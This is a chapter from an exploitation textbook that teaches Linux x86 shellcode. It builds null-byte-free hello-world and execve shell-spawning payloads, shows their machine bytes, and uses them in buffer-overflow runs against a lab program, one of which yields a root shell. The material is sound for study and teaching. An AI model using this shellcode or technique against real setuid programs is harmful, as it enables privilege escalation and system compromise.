SHELLCODE - Hacking: The Art of Exploitation (2008)

Hacking: The Art of Exploitation (2008)

Chapter 0x500. SHELLCODE

So far, the shellcode used in our exploits has been just a string of copied and pasted bytes. We have seen standard shell-spawning shellcode for local exploits and port-binding shellcode for remote ones. Shellcode is also sometimes referred to as an exploit payload, since these self-contained programs do the real work once a program has been hacked. Shellcode usually spawns a shell, as that is an elegant way to hand off control; but it can do anything a program can do.

Unfortunately, for many hackers the shellcode story stops at copying and pasting bytes. These hackers are just scratching the surface of what's possible. Custom shellcode gives you absolute control over the exploited program. Perhaps you want your shellcode to add an admin account to /etc/passwd or to automatically remove lines from log files. Once you know how to write your own shellcode, your exploits are limited only by your imagination. In addition, writing shellcode develops assembly language skills and employs a number of hacking techniques worth knowing.

Assembly vs. C

The shellcode bytes are actually architecture-specific machine instructions, so shellcode is written using the assembly language. Writing a program in assembly is different than writing it in C, but many of the principles are similar. The operating system manages things like input, output, process control, file access, and network communication in the kernel. Compiled C programs ultimately perform these tasks by making system calls to the kernel. Different operating systems have different sets of system calls.

In C, standard libraries are used for convenience and portability. A C program that uses printf() to output a string can be compiled for many different systems, since the library knows the appropriate system calls for various architectures. A C program compiled on an x86 processor will produce x86 assembly language.

By definition, assembly language is already specific to a certain processor architecture, so portability is impossible. There are no standard libraries; instead, kernel system calls have to be made directly. To begin our comparison, let's write a simple C program, then rewrite it in x86 assembly.

Assembly vs. C

helloworld.c

#include <stdio.h>

int main() {

printf("Hello, world!\n");

return 0;

}

When the compiled program is run, execution flows through the standard I/O library, eventually making a system call to write the string Hello, world! to the screen. The strace program is used to trace a program's system calls. Used on the compiled helloworld program, it shows every system call that program makes.

reader@hacking:~/booksrc $ gcc helloworld.c

reader@hacking:~/booksrc $ strace ./a.out

execve("./a.out", ["./a.out"], [/* 27 vars */]) = 0

brk(0) = 0x804a000

access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY) = 3

fstat64(3, {st_mode=S_IFREG|0644, st_size=61323, ...}) = 0

mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000

close(3) = 0

access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"..., 512) = 512

fstat64(3, {st_mode=S_IFREG|0755, st_size=1248904, ...}) = 0

mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000

mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,

0x12c) =

0xb7ee0000

mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) =

0xb7ee4000

close(3) = 0

mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000

set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,

contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

mprotect(0xb7ee0000, 8192, PROT_READ) = 0

munmap(0xb7ee7000, 61323) = 0

fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0

mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000

write(1, "Hello, world!\n", 13Hello, world!

) = 13

exit_group(0) = ?

Process 11528 detached

reader@hacking:~/booksrc $

As you can see, the compiled program does more than just print a string. The system calls at the start are setting up the environment and memory for the program, but the important part is the write() syscall shown in bold. This is what actually outputs the string.

The Unix manual pages (accessed with the man command) are separated into sections. Section 2 contains the manual pages for system calls, so man 2 write will describe the use of the write() system call:

Man Page for the write() System Call

WRITE(2) Linux Programmer's Manual

WRITE(2)

NAME

write - write to a file descriptor

SYNOPSIS

#include <unistd.h>

ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION

write() writes up to count bytes to the file referenced by the file

descriptor fd from the buffer starting at buf. POSIX requires that a

read() which can be proved to occur after a write() returns the new

data. Note that not all file systems are POSIX conforming.

The strace output also shows the arguments for the syscall. The bufand count arguments are a pointer to our string and its length. The fd argument of 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is similar to a number given out at a coat check. Opening a file descriptor is like checking in your coat, since you are given a number that can later be used to reference your coat. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. These values are standard and have been defined in several places, such as the /usr/include/unistd.h file on the following page.

From /usr/include/unistd.h

/* Standard file descriptors. */

#define STDIN_FILENO 0 /* Standard input. */

#define STDOUT_FILENO 1 /* Standard output. */

#define STDERR_FILENO 2 /* Standard error output. */

Writing bytes to standard output's file descriptor of 1 will print the bytes; reading from standard input's file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.

Linux System Calls in Assembly

Every possible Linux system call is enumerated, so they can be referenced by numbers when making the calls in assembly. These syscalls are listed in /usr/include/asm-i386/unistd.h.

From /usr/include/asm-i386/unistd.h

#ifndef _ASM_I386_UNISTD_H_

#define _ASM_I386_UNISTD_H_

/*

* This file contains the system call numbers.

*/

#define __NR_restart_syscall 0

#define __NR_exit 1

#define __NR_fork 2

#define __NR_read 3

#define __NR_write 4

#define __NR_open 5

#define __NR_close 6

#define __NR_waitpid 7

#define __NR_creat 8

#define __NR_link 9

#define __NR_unlink 10

#define __NR_execve 11

#define __NR_chdir 12

#define __NR_time 13

#define __NR_mknod 14

#define __NR_chmod 15

#define __NR_lchown 16

#define __NR_break 17

#define __NR_oldstat 18

#define __NR_lseek 19

#define __NR_getpid 20

#define __NR_mount 21

#define __NR_umount 22

#define __NR_setuid 23

#define __NR_getuid 24

#define __NR_stime 25

#define __NR_ptrace 26

#define __NR_alarm 27

#define __NR_oldfstat 28

#define __NR_pause 29

#define __NR_utime 30

#define __NR_stty 31

#define __NR_gtty 32

#define __NR_access 33

#define __NR_nice 34

#define __NR_ftime 35

#define __NR_sync 36

#define __NR_kill 37

#define __NR_rename 38

#define __NR_mkdir 39

...

For our rewrite of helloworld.c in assembly, we will make a system call to the write() function for the output and then a second system call to exit() so the process quits cleanly. This can be done in x86 assembly using just two assembly instructions: mov and int.

Assembly instructions for the x86 processor have one, two, three, or no operands. The operands to an instruction can be numerical values, memory addresses, or processor registers. The x86 processor has several 32-bit registers that can be viewed as hardware variables. The registers EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP can all be used as operands, while the EIP register (execution pointer) cannot.

The mov instruction copies a value between its two operands. Using Intel assembly syntax, the first operand is the destination and the second is the source. The int instruction sends an interrupt signal to the kernel, defined by its single operand. With the Linux kernel, interrupt 0x80 is used to tell the kernel to make a system call. When the int 0x80 instruction is executed, the kernel will make a system call based on the first four registers. The EAX register is used to specify which system call to make, while the EBX, ECX, and EDX registers are used to hold the first, second, and third arguments to the system call. All of these registers can be set using the mov instruction.

In the following assembly code listing, the memory segments are simply declared. The string "Hello, world!" with a newline character (0x0a) is in the data segment, and the actual assembly instructions are in the text segment. This follows proper memory segmentation practices.

helloworld.asm

section .data ; Data segment

msg db "Hello, world!", 0x0a ; The string and newline char

section .text ; Text segment

global _start ; Default entry point for ELF linking

_start:

; SYSCALL: write(1, msg, 14)

mov eax, 4 ; Put 4 into eax, since write is syscall #4.

mov ebx, 1 ; Put 1 into ebx, since stdout is 1.

mov ecx, msg ; Put the address of the string into ecx.

mov edx, 14 ; Put 14 into edx, since our string is 14 bytes.

int 0x80 ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)

mov eax, 1 ; Put 1 into eax, since exit is syscall #1.

mov ebx, 0 ; Exit with success.

int 0x80 ; Do the syscall.

The instructions of this program are straight forward. For the write() syscall to standard output, the value of 4 is put in EAX since the write() function is system call number 4. Then, the value of 1 is put into EBX, since the first argument of write() should be the file descriptor for standard output. Next, the address of the string in the data segment is put into ECX, and the length of the string (in this case, 14 bytes) is put into EDX. After these registers are loaded, the system call interrupt is triggered, which will call the write() function.

To exit cleanly, the exit() function needs to be called with a single argument of 0. So the value of 1 is put into EAX, since exit() is system call number 1, and the value of 0 is put into EBX, since the first and only argument should be 0. Then the system call interrupt is triggered again.

To create an executable binary, this assembly code must first be assembled and then linked into an executable format. When compiling C code, the GCC compiler takes care of all of this automatically. We are going to create an executable and linking format (ELF) binary, so the global _start line shows the linker where the assembly instructions begin.

The nasm assembler with the -f elf argument will assemble the helloworld.asm into an object file ready to be linked as an ELF binary. By default, this object file will be called helloworld.o. The linker program ld will produce an executable a.out binary from the assembled object.

reader@hacking:~/booksrc $ nasm -f elf helloworld.asm

reader@hacking:~/booksrc $ ld helloworld.o

reader@hacking:~/booksrc $ ./a.out

Hello, world!

reader@hacking:~/booksrc $

This tiny program works, but it's not shellcode, since it isn't self-contained and must be linked.

The Path to Shellcode

Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as position-independent code.

In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory. The string's absolute memory address needs to be calculated relative to EIP. Since EIP cannot be accessed from assembly instructions, however, we need to use some sort of trick.

Assembly Instructions Using the Stack

The stack is so integral to the x86 architecture that there are special instructions for its operations.

Instruction

Description

push <source>

Push the source operand to the stack.

pop <destination>

Pop a value from the stack and store in the destination operand.

call <location>

Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruvtion following the call is pushed to the stack, so that execution can return later.

ret

Return from a function, popping the return address from the stack and jumping execution there.

Stack-based exploits are made possible by the call and ret instructions. When a function is called, the return address of the next instruction is pushed to the stack, beginning the stack frame. After the function is finished, the retinstruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction, we can take control of a program's execution.

This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a popinstruction that will take the address off the stack and into a register. The following assembly instructions demonstrate this technique.

helloworld1.s

BITS 32 ; Tell nasm this is 32-bit code.

call mark_below ; Call below the string to instructions

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

mark_below:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

mov eax, 4 ; Write syscall #.

mov ebx, 1 ; STDOUT file descriptor

mov edx, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 14)

; void _exit(int status);

mov eax, 1 ; Exit syscall #

mov ebx, 0 ; Status = 0

int 0x80 ; Do syscall: exit(0)

The call instruction jumps execution down below the string. This also pushes the address of the next instruction to the stack, the next instruction in our case being the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This means that, when these instructions are assembled, they cannot be linked into an executable.

reader@hacking:~/booksrc $ nasm helloworld1.s

reader@hacking:~/booksrc $ ls -l helloworld1

-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1

reader@hacking:~/booksrc $ hexdump -C helloworld1

00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|

00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|

00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|

00000030 cd 80 |..|

00000032

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1

00000000 E80F000000 call 0x14

00000005 48 dec eax

00000006 656C gs insb

00000008 6C insb

00000009 6F outsd

0000000A 2C20 sub al,0x20

0000000C 776F ja 0x7d

0000000E 726C jc 0x7c

00000010 64210A and [fs:edx],ecx

00000013 0D59B80400 or eax,0x4b859

00000018 0000 add [eax],al

0000001A BB01000000 mov ebx,0x1

0000001F BA0F000000 mov edx,0xf

00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1

0000002B BB00000000 mov ebx,0x0

00000030 CD80 int 0x80

reader@hacking:~/booksrc $

The nasm assembler converts assembly language into machine code and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. The disassembly instructions marked in bold are the bytes of the "Hello, world!" string interpreted as instructions.

Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9c6

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.

Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal user. However, we also can't just attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited. This means that dumped core files are allowed to get as big as needed. Now, when the program crashes, the memory will be dumped to disk as a core file, which can be examined using GDB.

reader@hacking:~/booksrc $ sudo su

root@hacking:/home/reader/booksrc # ulimit -c unlimited

root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)

root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9a3

root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\

xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault (core dumped)

root@hacking:/home/reader/booksrc # ls -l ./core

-rw------- 1 root root 147456 2007-10-26 08:36 ./core

root@hacking:/home/reader/booksrc # gdb -q -c ./core

(no debugging symbols found)

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Core was generated by './notesearch

£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.

Program terminated with signal 11, Segmentation fault.

#0 0x2c6541b7 in ?? ()

(gdb) set dis intel

(gdb) x/5i 0xbffff9a3

0xbffff9a3: call 0x2c6541b7

0xbffff9a8: ins BYTE PTR es:[edi],[dx]

0xbffff9a9: outs [dx],DWORD PTR ds:[esi]

0xbffff9aa: sub al,0x20

0xbffff9ac: ja 0xbffffa1d

(gdb) i r eip

eip 0x2c6541b7 0x2c6541b7

(gdb) x/32xb 0xbffff9a3

0xbffff9a3: 0xe8 0x0f 0x48 0x65 0x6c 0x6c 0x6f 0x2c

0xbffff9ab: 0x20 0x77 0x6f 0x72 0x6c 0x64 0x21 0x0a

0xbffff9b3: 0x0d 0x59 0xb8 0x04 0xbb 0x01 0xba 0x0f

0xbffff9bb: 0xcd 0x80 0xb8 0x01 0xbb 0xcd 0x80 0x00

(gdb) quit

root@hacking:/home/reader/booksrc # hexdump -C helloworld1

00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|

00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|

00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|

00000030 cd 80 |..|

00000032

root@hacking:/home/reader/booksrc #

Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. The memory where the shellcode should be is examined. The instructions look incorrect, but it seems like the first incorrect call instruction is what caused the crash. At least, execution was redirected, but something went wrong with the shellcode bytes. Normally, strings are terminated by a null byte, but here, the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.

Removing Null Bytes

Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1

00000000 E80F000000 call 0x14

00000005 48 dec eax

00000006 656C gs insb

00000008 6C insb

00000009 6F outsd

0000000A 2C20 sub al,0x20

0000000C 776F ja 0x7d

0000000E 726C jc 0x7c

00000010 64210A and [fs:edx],ecx

00000013 0D59B80400 or eax,0x4b859

00000018 0000 add [eax],al

0000001A BB01000000 mov ebx,0x1

0000001F BA0F000000 mov edx,0xf

00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1

0000002B BB00000000 mov ebx,0x0

00000030 CD80 int 0x80

reader@hacking:~/booksrc $

This instruction jumps execution forward by 19 (0x13) bytes, based on the first operand. The call instruction allows for much longer jump distances, which means that a small value like 19 will have to be padded with leading zeros resulting in null bytes.

One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xffbytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.

helloworld2.s

BITS 32 ; Tell nasm this is 32-bit code.

jmp short one ; Jump down to a call at the end.

two:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

mov eax, 4 ; Write syscall #.

mov ebx, 1 ; STDOUT file descriptor

mov edx, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 14)

; void _exit(int status);

mov eax, 1 ; Exit syscall #

mov ebx, 0 ; Status = 0

int 0x80 ; Do syscall: exit(0)

one:

call two ; Call back upwards to avoid null bytes

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this new shellcode, disassembly shows that the call instruction (shown in italics below) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes (shown in bold).

reader@hacking:~/booksrc $ nasm helloworld2.s

reader@hacking:~/booksrc $ ndisasm -b32 helloworld2

00000000 EB1E jmp short 0x20

00000002 59 pop ecx

00000003 B804000000 mov eax,0x4

00000008 BB01000000 mov ebx,0x1

0000000D BA0F000000 mov edx,0xf

00000012 CD80 int 0x80

00000014 B801000000 mov eax,0x1

00000019 BB00000000 mov ebx,0x0

0000001E CD80 int 0x80

00000020 E8DDFFFFFF call 0x2

00000025 48 dec eax

00000026 656C gs insb

00000028 6C insb

00000029 6F outsd

0000002A 2C20 sub al,0x20

0000002C 776F ja 0x9d

0000002E 726C jc 0x9c

00000030 64210A and [fs:edx],ecx

00000033 0D db 0x0D

reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. This means execution can only jump a maximum of approximately 128 bytes in either direction. The normal jmp instruction, as well as the call instruction (which has no short version), allows for much longer jumps. The difference between assembled machine code for the two jump varieties is shown below:

EB 1E jmp short 0x20

versus

E9 1E 00 00 00 jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.

Machine code

Assembly

B8 04 00 00 00

mov eax,0x4

66 B8 04 00

mov ax,0x4

B0 04

mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the 32-bit register values to be correct, we need to zero out the entire register before the mov instructions—but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. These first two are small instructions that increment and decrement their operand by one.

Instruction

Description

inc <target>

Increment the target operand by adding 1 to it.

dec <target>

Decrement the target operand by subtracting 1 from it.

The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.

Instruction

Description

add <dest>, <source>

Add the source operand to the destination operand, storing the result in the destination.

sub <dest>, <source>

Subtract the source operand from the destination operand, storing the result in the destination.

or <dest>, <source>

Perform a bitwise or logic operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 or 0 = 1

1 or 1 = 1

0 or 1 = 1

0 or 0 = 0

If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result is off. The final result is stored in the destination operand.

and <dest>, <source>

Perform a bitwise and logic operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 or 0 = 0

1 or 1 = 1

0 or 1 = 0

0 or 0 = 0

The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.

xor <dest>, <source>

Perform a bitwise exclusive or (xor) logical operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 or 0 = 1

1 or 1 = 0

0 or 1 = 1

0 or 0 = 0

If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand.

One method is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions:

B8 44 33 22 11 mov eax,0x11223344

2D 44 33 22 11 sub eax,0x11223344

While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction comprises 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction:

29 C0 sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning of shellcode. This instruction will modify processor flags, which are used for branching, however. For that reason, there is a preferred two-byte instruction that is used to zero registers in most shellcode. The xor instruction performs an ex clusive or operation on the bits in a register. Since 1 xor ed with 1 results in a 0, and 0 xored with 0 results in a 0, any value xor ed with itself will result in 0. This is the same result as with any value subtracted from itself, but the xor instruction doesn't modify processor flags, so it's considered to be a cleaner method.

31 C0 xor eax,eax

You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and decinstructions have also been used when possible to make for even smaller shellcode.

helloworld3.s

BITS 32 ; Tell nasm this is 32-bit code.

jmp short one ; Jump down to a call at the end.

two:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

xor eax, eax ; Zero out full 32 bits of eax register.

mov al, 4 ; Write syscall #4 to the low byte of eax.

xor ebx, ebx ; Zero out ebx.

inc ebx ; Increment ebx to 1, STDOUT file descriptor.

xor edx, edx

mov dl, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 14)

; void _exit(int status);

mov al, 1 ; Exit syscall #1, the top 3 bytes are still zeroed.

dec ebx ; Decrement ebx back down to 0 for status = 0.

int 0x80 ; Do syscall: exit(0)

one:

call two ; Call back upwards to avoid null bytes

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.

reader@hacking:~/booksrc $ nasm helloworld3.s

reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00

00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |..Y1...1.C1.....|

00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |..K.......Hello,|

00000020 20 77 6f 72 6c 64 21 0a 0d | world!..|

00000029

reader@hacking:~/booksrc $

Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9bc

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

Hello, world!

reader@hacking :~/booksrc $

Shell-Spawning Shellcode

Now that you've learned how to make system calls and avoid null bytes, all sorts of shellcodes can be constructed. To spawn a shell, we just need to make a system call to execute the /bin/sh shell program. System call number 11, execve(), is similar to the C execute() function that we used in the previous chapters.

EXECVE(2) Linux Programmer's Manual EXECVE(2)

NAME

execve - execute program

SYNOPSIS

#include <unistd.h>

int execve(const char *filename, char *const argv[],

char *const envp[]);

DESCRIPTION

execve() executes the program pointed to by filename. Filename must be

either a binary executable, or a script starting with a line of the

form "#! interpreter [arg]". In the latter case, the interpreter must

be a valid pathname for an executable which is not itself a script,

which will be invoked as interpreter [arg] filename.

argv is an array of argument strings passed to the new program. envp

is an array of strings, conventionally of the form key=value, which are

passed as environment to the new program. Both argv and envp must be

terminated by a null pointer. The argument vector and environment can

be accessed by the called program's main function, when it is defined

as int main(int argc, char *argv[], char *envp[]).

The first argument of the filename should be a pointer to the string "/bin/sh", since this is what we want to execute. The environment array— the third argument—can be empty, but it still need to be terminated with a 32-bit null pointer. The argument array—the second argument—must be nullterminated, too; it must also contain the string pointer (since the zeroth argument is the name of the running program). Done in C, a program making this call would look like this:

Shell-Spawning Shellcode

exec_shell.c

#include <unistd.h>

int main() {

char filename[] = "/bin/sh\x00";

char **argv, **envp; // Arrays that contain char pointers

argv[0] = filename; // The only argument is filename.

argv[1] = 0; // Null terminate the argument array.

envp[0] = 0; // Null terminate the environment array.

execve(filename, argv, envp);

}

To do this in assembly, the argument and environment arrays need to be built in memory. In addition, the "/bin/sh" string needs to be terminated with a null byte. This must be built in memory as well. Dealing with memory in assembly is similar to using pointers in C. The lea instruction, whose name stands for load effective address, works like the address-of operator in C.

Instruction

Description

lea <dest>, <source>

Load the effective address of the source operand into the destination operand.

With Intel assembly syntax, operands can be dereferenced as pointers if they are surrounded by square brackets. For example, the following instruction in assembly will treat EBX+12 as a pointer and write eax to where it's pointing.

89 43 0C mov [ebx+12],eax

The following shellcode uses these new instructions to build the execve() arguments in memory. The environment array is collapsed into the end of the argument array, so they share the same 32-bit null terminator.

exec_shell.s

BITS 32

jmp short two ; Jump down to the bottom for the call trick.

one:

; int execve(const char *filename, char *const argv [], char *const envp[])

pop ebx ; Ebx has the addr of the string.

xor eax, eax ; Put 0 into eax.

mov [ebx+7], al ; Null terminate the /bin/sh string.

mov [ebx+8], ebx ; Put addr from ebx where the AAAA is.

mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.

lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr.

lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.

mov al, 11 ; Syscall #11

int 0x80 ; Do it.

two:

call one ; Use a call to get string address.

db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed.

After terminating the string and building the arrays, the shellcode uses the lea instruction (shown in bold above) to put a pointer to the argument array into the ECX register. Loading the effective address of a bracketed register added to a value is an efficient way to add the value to the register and store the result in another register. In the example above, the brackets dereference EBX+8 as the argument to lea, which loads that address into EDX. Loading the address of a dereferenced pointer produces the original pointer, so this instruction puts EBX+8 into EDX. Normally, this would require both a mov and an add instruction. When assembled, this shellcode is devoid of null bytes. It will spawn a shell when used in an exploit.

reader@hacking:~/booksrc $ nasm exec_shell.s

reader@hacking:~/booksrc $ wc -c exec_shell

36 exec_shell

reader@hacking:~/booksrc $ hexdump -C exec_shell

00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|

00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|

00000020 6e 2f 73 68 |n/sh|

00000024

reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9c0

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#

This shellcode, however, can be shortened to less than the current 45 bytes. Since shellcode needs to be injected into program memory somewhere, smaller shellcode can be used in tighter exploit situations with smaller usable buffers. The smaller the shellcode, the more situations it can be used in. Obviously, the XAAAABBBB visual aid can be trimmed from the end of the string, which brings the shellcode down to 36 bytes.

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell

00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|

00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|

00000020 6e 2f 73 68 |n/sh|

00000024

reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell

36 exec_shell

